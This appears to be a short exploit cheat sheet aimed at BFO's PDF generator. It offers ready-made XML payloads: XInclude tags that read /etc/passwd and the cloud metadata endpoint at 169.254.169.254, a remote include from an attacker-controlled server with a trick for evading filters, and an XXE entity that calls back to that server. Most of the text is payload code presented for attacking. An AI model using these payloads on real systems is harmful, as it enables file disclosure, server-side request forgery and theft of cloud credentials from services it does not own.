Insecurities/Big-Face-Exploit

Exploit sheet for BFOs PDF Gen.

Attacking BFO's PDF Gen.

INFO DISCLOSURE: Version

WIP

EXPLOIT VECTOR 1: <pdfset> with XInclude

Local File Inclusion / HTTP Response View (SSRF)

Assuming you have the ability to add a pdfset or pdf element you can potentially load the XML Include namespace with:

<pdfset xmlns:xi="http://www.w3.org/2003/XInclude">
OR
<pdf xmlns:xi="http://www.w3.org/2003/XInclude">

This should allow you to use the namespace in the document to retrieve local files and the response from HTTP requests

Note: parse="text" is probably required for the files you want to retrieve, since they might not be XML.

<!-- Local file read -->
<xi:include parse="text" href="file:///etc/passwd" />
<!-- Remote HTTP response read --> 
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/" />

Bypassing Filtering systems

Assuming you can use the xinclude namespace, you might be able to bypass filtering implementations by referencing a remote XML sheet:

<xi:include href="https://{YOUR_SERVER}/test.xml" />

When the PDF is generated the xinclude will be used to pull content from the remote location ({YOUR_SERVER]) and load it into the document. If filtering is in place for the xmlns:xi element you can always rename it to xmlns:xd or similar and still use it.

EXPLOIT VECTOR 2: External Entity Processing El-Classico

Assuming you can add headers before <pdf> or <pdfset> BFO seems to largely behave similar to most XML parsers so if you want to do classic replace elements you can!

<!DOCTYPE replace [<!ENTITY ent SYSTEM "https://{YOUR_SERVER}/callback?"> ]>
<pdf>
	<body>
		&ent;
	</body>
</pdf>